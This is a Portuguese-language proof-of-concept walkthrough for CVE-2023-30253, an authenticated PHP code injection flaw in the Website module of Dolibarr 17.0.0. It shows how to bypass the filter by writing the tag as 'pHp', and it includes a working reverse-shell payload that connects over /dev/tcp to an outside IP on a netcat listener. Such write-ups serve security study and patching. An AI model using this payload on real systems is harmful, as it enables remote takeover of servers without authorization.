
No Dolibarr 17.0.0 com o plugin CMS Website (core) habilitado, um atacante autenticado pode obter execução remota de comandos via injeção de código php, contornando as restrições da aplicação.
A CVE-2023-30253 é uma falha de segurança no software Dolibarr que permite que usuários autenticados executem código remoto utilizando uma técnica de manipulação de maiúsculas em dados injetados.
Esta vulnerabilidade pode levar à execução remota de código não autorizada por agentes maliciosos, representando uma grave ameaça à segurança e integridade dos sistemas afetados. A vulnerabilidade foi corrigida no Dolibarr 17.0.1.
https://www.swascan.com/security-advisory-dolibarr-17-0-0/
https://github.com/Dolibarr/dolibarr
A POC a seguir mostra como obter um shell reverso manualmente.

Após fazer login como usuário de teste, podemos criar/modificar o site.
.png)
Primeiro crie um site e, em seguida, crie uma página.
.png)

Depois de criar o site e a página, clique no ícone de binóculos; isso abrirá nossa página criada em uma nova guia.
Agora clique em Editar HTML Source.
.png)
Aqui podemos tentar adicionar código php, mas existe algum tipo de filtro que nos impede de escrever código php. Isso pode ser facilmente contornado alterando o formato da palavra php.
.png)
Após alterar o formato da palavra php para pHp, podemos ver que foi salvo com sucesso.
.png)
Indo para a página, podemos ver que nosso código php inserido está funcionando.
Agora, para obter o shell reverso, vamos configurar o ouvinte netcat.
.png)
.png)
Em seguida, adicione nosso código de shell reverso <?pHp exec("/bin/bash -c 'bash -i > /dev/tcp/10.10.14.101/1010 0>&1'"); ?>
Agora abrindo o site, obtemos o shell reverso.
.png)
Podemos usar o código python para facilitar.

Configure o ouvinte netcat.

Execute o script e devemos obter um shell reverso.